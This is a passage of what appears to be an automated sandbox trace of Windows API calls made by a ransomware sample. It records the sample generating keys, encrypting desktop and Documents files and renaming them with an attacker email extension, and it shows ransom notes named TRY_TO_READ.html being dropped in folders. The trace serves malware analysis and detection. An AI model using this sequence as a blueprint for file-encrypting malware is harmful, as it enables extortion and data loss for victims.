dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x495 [0160.896] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.896] GetProcessHeap () returned 0x2e0000 [0160.896] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0160.896] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.896] WriteFile (in: hFile=0x398, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.897] WriteFile (in: hFile=0x398, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.897] WriteFile (in: hFile=0x398, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.897] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x495) returned 0x31d01e0 [0160.897] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x495) returned 0x31d0680 [0160.897] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.897] ReadFile (in: hFile=0x398, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0x495, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0x495, lpOverlapped=0x0) returned 1 [0160.897] SetFilePointer (in: hFile=0x398, lDistanceToMove=-1173, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.897] WriteFile (in: hFile=0x398, lpBuffer=0x31d0680*, nNumberOfBytesToWrite=0x495, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d0680*, lpNumberOfBytesWritten=0x2acf9c8*=0x495, lpOverlapped=0x0) returned 1 [0160.898] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0160.898] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0160.898] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1LSF euTPv6HuPHC5.mp3", dwFileAttributes=0x80) returned 1 [0160.898] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1LSF euTPv6HuPHC5.mp3") returned 60 [0160.898] GetProcessHeap () returned 0x2e0000 [0160.898] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xde) returned 0x319d30 [0160.898] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1LSF euTPv6HuPHC5.mp3" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1LSF euTPv6HuPHC5.mp3") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1LSF euTPv6HuPHC5.mp3" [0160.898] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1LSF euTPv6HuPHC5.mp3", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1LSF euTPv6HuPHC5.mp3.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1LSF euTPv6HuPHC5.mp3.12781717671972518758.ex_parvis@aol.com.AIR" [0160.898] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1LSF euTPv6HuPHC5.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1lsf eutpv6huphc5.mp3"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1LSF euTPv6HuPHC5.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1lsf eutpv6huphc5.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.901] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1LSF euTPv6HuPHC5.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1lsf eutpv6huphc5.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0160.901] GetProcessHeap () returned 0x2e0000 [0160.901] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0160.901] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=70282) returned 1 [0160.901] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1128a [0160.901] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.901] GetProcessHeap () returned 0x2e0000 [0160.901] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0160.901] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.901] WriteFile (in: hFile=0x398, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.902] WriteFile (in: hFile=0x398, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.902] WriteFile (in: hFile=0x398, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.902] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x1128a) returned 0x3ac410 [0160.903] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x1128a) returned 0x30d0048 [0160.903] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.903] ReadFile (in: hFile=0x398, lpBuffer=0x3ac410, nNumberOfBytesToRead=0x1128a, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ac410*, lpNumberOfBytesRead=0x2acf9c8*=0x1128a, lpOverlapped=0x0) returned 1 [0160.904] SetFilePointer (in: hFile=0x398, lDistanceToMove=-70282, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.904] WriteFile (in: hFile=0x398, lpBuffer=0x30d0048*, nNumberOfBytesToWrite=0x1128a, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x1128a, lpOverlapped=0x0) returned 1 [0160.906] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x978366d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978366d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e318 [0160.907] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x978366d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978366d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.907] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1317edd0, ftCreationTime.dwHighDateTime=0x1d57bb5, ftLastAccessTime.dwLowDateTime=0x243f9cc0, ftLastAccessTime.dwHighDateTime=0x1d574bc, ftLastWriteTime.dwLowDateTime=0x243f9cc0, ftLastWriteTime.dwHighDateTime=0x1d574bc, nFileSizeHigh=0x0, nFileSizeLow=0xc468, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0lIWJN5A9TmHC9z4d72.docx", cAlternateFileName="0LIWJN~1.DOC")) returned 1 [0160.907] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f1b2600, ftCreationTime.dwHighDateTime=0x1d52c9d, ftLastAccessTime.dwLowDateTime=0x18111620, ftLastAccessTime.dwHighDateTime=0x1d52680, ftLastWriteTime.dwLowDateTime=0x18111620, ftLastWriteTime.dwHighDateTime=0x1d52680, nFileSizeHigh=0x0, nFileSizeLow=0xe7ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0WRMCpBzWaC.docx", cAlternateFileName="0WRMCP~1.DOC")) returned 1 [0160.907] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdfff0410, ftCreationTime.dwHighDateTime=0x1d51f34, ftLastAccessTime.dwLowDateTime=0x89df2250, ftLastAccessTime.dwHighDateTime=0x1d52834, ftLastWriteTime.dwLowDateTime=0x89df2250, ftLastWriteTime.dwHighDateTime=0x1d52834, nFileSizeHigh=0x0, nFileSizeLow=0xacec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0z_9GsJMSC16Pu.xlsx", cAlternateFileName="0Z_9GS~1.XLS")) returned 1 [0160.907] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa38f2be0, ftCreationTime.dwHighDateTime=0x1d4c976, ftLastAccessTime.dwLowDateTime=0xced4be60, ftLastAccessTime.dwHighDateTime=0x1d4c7f9, ftLastWriteTime.dwLowDateTime=0xced4be60, ftLastWriteTime.dwHighDateTime=0x1d4c7f9, nFileSizeHigh=0x0, nFileSizeLow=0x3b37, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2HUBqQFglQJkSTU.xls", cAlternateFileName="2HUBQQ~1.XLS")) returned 1 [0160.907] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7badca50, ftCreationTime.dwHighDateTime=0x1d4d3b7, ftLastAccessTime.dwLowDateTime=0x380177f0, ftLastAccessTime.dwHighDateTime=0x1d4c856, ftLastWriteTime.dwLowDateTime=0x380177f0, ftLastWriteTime.dwHighDateTime=0x1d4c856, nFileSizeHigh=0x0, nFileSizeLow=0x13e5e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5i9nrfOUFqA0KBlVyWWU.odt", cAlternateFileName="5I9NRF~1.ODT")) returned 1 [0160.907] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a18e6e0, ftCreationTime.dwHighDateTime=0x1d547b8, ftLastAccessTime.dwLowDateTime=0xc3737a70, ftLastAccessTime.dwHighDateTime=0x1d517cc, ftLastWriteTime.dwLowDateTime=0xc3737a70, ftLastWriteTime.dwHighDateTime=0x1d517cc, nFileSizeHigh=0x0, nFileSizeLow=0x56d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Bs2QPeTU27XrxffvX4.docx", cAlternateFileName="BS2QPE~1.DOC")) returned 1 [0160.907] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0160.907] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc11032c0, ftCreationTime.dwHighDateTime=0x1d4c64e, ftLastAccessTime.dwLowDateTime=0xbcc18a90, ftLastAccessTime.dwHighDateTime=0x1d4cb5b, ftLastWriteTime.dwLowDateTime=0xbcc18a90, ftLastWriteTime.dwHighDateTime=0x1d4cb5b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f8_EXF", cAlternateFileName="")) returned 1 [0160.907] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f8_EXF\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8_exf\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0160.910] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc13e5b90, ftCreationTime.dwHighDateTime=0x1d5256d, ftLastAccessTime.dwLowDateTime=0x17433800, ftLastAccessTime.dwHighDateTime=0x1d594cf, ftLastWriteTime.dwLowDateTime=0x17433800, ftLastWriteTime.dwHighDateTime=0x1d594cf, nFileSizeHigh=0x0, nFileSizeLow=0x10529, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fh77NqQwT8vt6YlFs6Rb.docx", cAlternateFileName="FH77NQ~1.DOC")) returned 1 [0160.910] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x300d7b60, ftCreationTime.dwHighDateTime=0x1d4cb27, ftLastAccessTime.dwLowDateTime=0x28fdc2e0, ftLastAccessTime.dwHighDateTime=0x1d4d0ee, ftLastWriteTime.dwLowDateTime=0x28fdc2e0, ftLastWriteTime.dwHighDateTime=0x1d4d0ee, nFileSizeHigh=0x0, nFileSizeLow=0x3914, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HWBJIt.docx", cAlternateFileName="HWBJIT~1.DOC")) returned 1 [0160.910] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9430a2e0, ftCreationTime.dwHighDateTime=0x1d5952d, ftLastAccessTime.dwLowDateTime=0x32fd0700, ftLastAccessTime.dwHighDateTime=0x1d524c8, ftLastWriteTime.dwLowDateTime=0x32fd0700, ftLastWriteTime.dwHighDateTime=0x1d524c8, nFileSizeHigh=0x0, nFileSizeLow=0x499f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="I6b3hI3IEf5-t.xlsx", cAlternateFileName="I6B3HI~1.XLS")) returned 1 [0160.910] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa3def00, ftCreationTime.dwHighDateTime=0x1d58daa, ftLastAccessTime.dwLowDateTime=0x1d77e290, ftLastAccessTime.dwHighDateTime=0x1d56e76, ftLastWriteTime.dwLowDateTime=0x1d77e290, ftLastWriteTime.dwHighDateTime=0x1d56e76, nFileSizeHigh=0x0, nFileSizeLow=0x226c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Joj1nKzjZBmA.pptx", cAlternateFileName="JOJ1NK~1.PPT")) returned 1 [0160.910] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc2066b0, ftCreationTime.dwHighDateTime=0x1d58fd1, ftLastAccessTime.dwLowDateTime=0xed1f8900, ftLastAccessTime.dwHighDateTime=0x1d52207, ftLastWriteTime.dwLowDateTime=0xed1f8900, ftLastWriteTime.dwHighDateTime=0x1d52207, nFileSizeHigh=0x0, nFileSizeLow=0x167b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JPZY0v5 sNowOytYe0.pptx", cAlternateFileName="JPZY0V~1.PPT")) returned 1 [0160.910] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc72995c0, ftCreationTime.dwHighDateTime=0x1d56ecd, ftLastAccessTime.dwLowDateTime=0x12c14540, ftLastAccessTime.dwHighDateTime=0x1d57776, ftLastWriteTime.dwLowDateTime=0x12c14540, ftLastWriteTime.dwHighDateTime=0x1d57776, nFileSizeHigh=0x0, nFileSizeLow=0xefdf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="M-gSy_kIi1Eao0JzZFv.pptx", cAlternateFileName="M-GSY_~1.PPT")) returned 1 [0160.910] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0160.910] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my music\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0160.912] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0160.912] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my pictures\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0160.913] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0160.913] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0160.916] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0160.916] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my videos\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0160.917] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12e65740, ftCreationTime.dwHighDateTime=0x1d55057, ftLastAccessTime.dwLowDateTime=0x552a5da0, ftLastAccessTime.dwHighDateTime=0x1d52e32, ftLastWriteTime.dwLowDateTime=0x552a5da0, ftLastWriteTime.dwHighDateTime=0x1d52e32, nFileSizeHigh=0x0, nFileSizeLow=0x8d13, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nHf6.xlsx", cAlternateFileName="NHF6~1.XLS")) returned 1 [0160.917] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9da7580, ftCreationTime.dwHighDateTime=0x1d5139b, ftLastAccessTime.dwLowDateTime=0x7c290090, ftLastAccessTime.dwHighDateTime=0x1d50ae8, ftLastWriteTime.dwLowDateTime=0x7c290090, ftLastWriteTime.dwHighDateTime=0x1d50ae8, nFileSizeHigh=0x0, nFileSizeLow=0x16931, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="O9_F9.xlsx", cAlternateFileName="O9_F9~1.XLS")) returned 1 [0160.917] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0160.917] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0160.919] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e902120, ftCreationTime.dwHighDateTime=0x1d563fa, ftLastAccessTime.dwLowDateTime=0xe33a14b0, ftLastAccessTime.dwHighDateTime=0x1d55875, ftLastWriteTime.dwLowDateTime=0xe33a14b0, ftLastWriteTime.dwHighDateTime=0x1d55875, nFileSizeHigh=0x0, nFileSizeLow=0x105f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OV-wsJ1ouPCLOQXSQ.pptx", cAlternateFileName="OV-WSJ~1.PPT")) returned 1 [0160.919] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57f1ace0, ftCreationTime.dwHighDateTime=0x1d52b72, ftLastAccessTime.dwLowDateTime=0xe149b620, ftLastAccessTime.dwHighDateTime=0x1d55914, ftLastWriteTime.dwLowDateTime=0xe149b620, ftLastWriteTime.dwHighDateTime=0x1d55914, nFileSizeHigh=0x0, nFileSizeLow=0x3db5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pv7RP.pptx", cAlternateFileName="PV7RP~1.PPT")) returned 1 [0160.919] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5da87120, ftCreationTime.dwHighDateTime=0x1d5357a, ftLastAccessTime.dwLowDateTime=0xeea04110, ftLastAccessTime.dwHighDateTime=0x1d55395, ftLastWriteTime.dwLowDateTime=0xeea04110, ftLastWriteTime.dwHighDateTime=0x1d55395, nFileSizeHigh=0x0, nFileSizeLow=0x10079, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Qbw0t07_.docx", cAlternateFileName="QBW0T0~1.DOC")) returned 1 [0160.919] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6cde7f0, ftCreationTime.dwHighDateTime=0x1d4cc29, ftLastAccessTime.dwLowDateTime=0xc7b351d0, ftLastAccessTime.dwHighDateTime=0x1d4d2d2, ftLastWriteTime.dwLowDateTime=0xc7b351d0, ftLastWriteTime.dwHighDateTime=0x1d4d2d2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SK4X4k0", cAlternateFileName="")) returned 1 [0160.919] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SK4X4k0\\TRY_TO_READ.html" (normalized: 